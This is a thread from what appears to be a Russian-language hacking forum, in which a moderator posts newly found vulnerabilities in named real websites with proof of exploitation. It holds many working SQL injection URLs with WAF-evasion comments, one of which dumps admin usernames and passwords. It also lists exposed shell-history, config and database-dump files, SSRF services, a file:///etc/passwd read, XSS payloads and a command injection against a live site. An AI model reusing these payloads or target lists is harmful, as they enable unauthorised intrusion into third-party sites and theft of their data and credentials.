Дата: 20/10/17 - 20:59 pm   9448 Тем и 92517 Сообщений

Автор Тема: Ваши найденные уязвимости  (Прочитано 47342 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Июня 13, 2017, 03:30:29 am
Прочитано 47342 раз

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 42
    02.03.17
  • Reputation:
    18
    • Просмотр профиля
Предлагаю в этой  теме  выкладывать вами найденные уязвимости.
Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. для этого достаточно в google сделать запрос : site:damagelab.in  ваш_уязвимый_сайт   
                ВАЖНО:
 1)  Пост должен содержать  уникальный сайт(нигде ране не опубликован с подобной уязвимостью)
 2)  Пост может  сопровождаться  вашими комментариями  и  куском  кода  при необходимости
 3)  Пост  должен содержать результат  эксплуатации уязвимости.  Для  sql  достаточно   будет  получить   версию, пользователя или название базы.  xss aler(); 
  4)  Если по тем или иным причинам выложить сайт не возможно, или  уязвимость носит другой  характер, ошибка   конфигурации или  бинарная  , тогда   принимаются  скрины   плюс описание  уязвимости, метода её эксплуатаци и результат.

                       
 Пример :

SQL inj
http://www.styleme.co.in/index.php?action=reviewdetail&id=26  union select GROUP_CONCAT(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()

Бекап

Цитировать
https://vobjem.ru/dump.sql

   
В теме запрещены  посты  не  по теме.
Старайтесь выкладывать уязвимость с кодом - это будет вам большой плюс.


« Последнее редактирование: Июня 13, 2017, 04:13:15 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Июня 13, 2017, 05:31:28 pm
Ответ #1

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 42
    02.03.17
  • Reputation:
    18
    • Просмотр профиля
https://www.anti-malware.ru/.bash_history
https://www.anti-malware.ru/phpinfo.php
А казалось бы  серьёзный ресурс, около ибэ

http://доу233ржд.рф/www.zip
Качаем, открываем файл config и смотрим данные


http://www.bikesbikesbikesuk.com/list.php?catid=1+UnIon+select+111111111,(select  group_concat(0x3c62723e,table_name)+from+information_schema.tables   where table_schema=database()),3333333333333333,44444444444444444,5555555555555555,66666666666666,77777777777777,8888888888888888,999999999999+--+-

https://www.pecpodsnezkou.cz/hasici/akce-detail.php?id=1363516980+UnIon+seLect+1,2,3,GroUp_concat(0x3c62723e,TaBle_name,0x20,column_name ),5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_schema=database()

http://www.quicktrade.co.in/category_list.php?id=32+/*!50000UnIoN*/+SeLecT+1,2,3,/*!12345CoNcat*/(0x3c68313e,TabLe_name),5,6,7,8,9,10,11,12,13,14+from+/*!12345information_schema.tables*/+--+-

http://www.lambbuilding.co.uk/practice/arealist.php?id=20+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!12345database*/())))--

http://www.lambbuilding.co.uk/practice/arealist.php
?id=20+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!50000concat*/(/*!12345table_name*/)+/*!13337from*/+/*!50000information_schema.tables*/  limit 66,1)))--

http://unisunbd.com/page.php?cid=1&page=-522'+/*!13337UNiOn*/+seLect+1,table_name,3,4,5+from+/*!13337information_schema.tables*/limit  20,1+--+-
http://www.larrysparks.com/gallery.php?id=1'+/*!50000UnIoN*/+SeLect+user(),2,3,4+--+-
http://cart.shoppingtechnology.com/cart/affiliate-agreement.cfm
?storeid=3+ and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))--


http://my-files.ru/qxqv6p
Дамп  нескольких сайтов
 
ssrf
http://www.1-hit.com/sniffer.htm


ssrf
http://testuri.org/sniffer



SSRF
http://www.getacert.com


getacert.com Ещё  тут рце нашёл  или command injection 

SSRF
http://web-sniffer.me

Вот  сила  данной  атаки, попробуйте Nmap -p 25  web-sniffer.me
« Последнее редактирование: Июня 29, 2017, 03:20:50 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Июля 08, 2017, 03:13:27 am
Ответ #2

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 42
    02.03.17
  • Reputation:
    18
    • Просмотр профиля
Легенькая  sql+waf
http://www.bpc.gov.bd/contactus.php?id=-13'+/*!50000UniOn*/+SeLecT+1,2,/*!12345GrOuP_CoNCaT(TaBle_NaMe,0x2020,CoLuMn_NaMe)*/,4,5,6,7+FrOM+/*!50000InFoRmaTioN_SchEMa*/.CoLuMnS/*!50000+WhEre*/ TaBle_SchEma=DaTabAsE()+--+-
https://www.micro-mechanics.com/about.php?id=-3+/*!50000UnIOn*/+SeLecT+1,2,/*!12345GroUp_CoNcaT%28username,0x3c62723e,password%20%29*/,4,5,6,7,8,9,10,11%20FroM%20admin
http://eco3d.co.uk/library/browse.php?catid=-1372+UnIoN+SeLEcT+1,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),3,4,5,6,7
http://reelmen.com/shop-browse.php?catId=3') UNION ALL SELECT GrOuP_CONCAT(0x3c62723e,0x223e3c62723e,TaBle_NaMe,0x2020,CoLuMn_NaMe),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FrOM+InFoRmaTioN_SchEMa.CoLuMnS+WhEre TaBle_SchEma=DaTabAsE()--+-

sql+waf
http://www.tacc.co.il/story.php?id=-9  /*!12345UnIoN+*//*!13337SeLEcT+*/1,2,3,4,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a),6,7,8


XSS
http://easygirls.org/bad.php?texid=><script>alert(123);</script></


SQL
http://www.xenon-rus.ru/search/?searchstring=1"+" and extractvalue(0x0a,concat(0x0a,(select database())))+--+-
Крутим,смотрим, читаем , есть всё  что бы  в  1  запрос залить шел, надо найти только одно. Для самостоятельной работы

http://srn.su/wp-content/themes/1.php


Уязвимость в  пакете  обработки видео.
https://www.onlinevideoconverter.com
https://youtu.be/FaVTfkoOqn4
Цитировать
https://convertio.co
https://online-converting.ru/
http://www.konvertor.org/
Результат http://files.danstools.com/file-convert/result/output.mp4?_ga=2.130601295.1333876469.1501975828-741135336.1501975828
https://cloudconvert.com/

SQL
https://www.beautydepot.ru/search.php?search=process&title=&for=&cat=&subcategory=&family=&nota1=&nota2=%27+and%20extractvalue(0x0a,concat(0x0a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()+limit%2018,1)))+--+-&nota3=&price=%27&page=847%27
« Последнее редактирование: Августа 17, 2017, 05:29:08 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Августа 23, 2017, 08:42:28 pm
Ответ #3

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 42
    02.03.17
  • Reputation:
    18
    • Просмотр профиля
SSRF, XSS and race condition

www.tutorialspoint.com/online_xml_editor.htm
уязвимости в форме загрузки файла

<?php 
  $type = isset($_GET['type'])?$_GET['type']:'';
   if($type != ''){
      $url = $_GET['url'];
      $url = preg_replace('#^https?://#', 'http://', $url);
      $opts = array(
        'http'=>array(
        'method'=>"GET",
        'header'=>"Accept-language: en\r\n" .
                    "Cookie: foo=bar\r\n"
        )
      );
      if(filter_var($url, FILTER_VALIDATE_URL) === false) {
           echo("$url is not a valid URL");
           exit;
      }
      $context = stream_context_create($opts);
      $data = file_get_contents ($url,false,$context);
      if(empty($data)){
         echo -1;
      } else {
         echo $data;   
      }
     
   } else {
      $file = $_FILES['file'];
      $filepath = '/tmp/'. $file['name'];
     $filename = realpath( $filepath );
      if(move_uploaded_file($file['tmp_name'],$filepath ))   
      {
         chmod($filepath, 0777);
         $data = file_get_contents ($filepath);   
         echo $data;
      unlink($filepath);
      }
     
   }
   exit;
?>
НО, к  сожалению из за  особенности  веб сервера   состоянии гонки не  эксплуатируемая

Для локального теста используйте форуму.
<form  method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><input name=file type=file><input type=text name=uploadDir value=><input type=submit name=upload value=up></form>
 

или ресурс
http://SiteTestNax.ua.host1614634.serv16.hostland.pro/

Цитировать
1) Переходим на сайт, видим  Форму загрузки.
2) открываем исходный код, мы видим, что есть исходники.
3) понимаем, что там ssrf. Проверяем
4) http://sitetestnax.ua.host1614634.serv16.hostland.pro/?url=http://gogle.com&type=1
http://Http://sitetestnax.ua.host1614634.serv16.hostland.pro/?url=file:///etc/passwd&type=1
5) Форма загрузки .
Обратим внимание на код


$file = $_FILES['file'];
      $filepath = '/home/host1614634/tmp/'. $file['name'];
     $filename = realpath( $filepath );
      if(move_uploaded_file($file['tmp_name'],$filepath ))
      {
         chmod($filepath, 0777);
     @    $data = file_get_contents ($filepath);
          echo  '<pre>';
         echo $data;
          echo  '</pre>';
      unlink($filepath);
Понимаем, что уязвимость состояния гонки

6)
пишем  скрипт, или в  бурпе  делаем запросы, 
1-й  запрос  на  загрузку  файла,  второй  обращение  к  файлу


7) Та же  есть  XSS
http://sitetestnax.ua.host1614634.serv16.hostland.pro/?url=<script>alert(123)</script>&type=1






 http://audio.nur.kz/search?
"><script>alert(12313);</script>  xss  poisk
http://audio.nur.kz/config/sphinx/gen/sphinx-dev.conf   config



 Command inj
https://dict.longdo.com/?is-auto-language=true&search=the&translate-language=d%7cls -lah%26uname%20%2da%26&translate-type=popthai
« Последнее редактирование: Августа 29, 2017, 01:03:14 pm от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep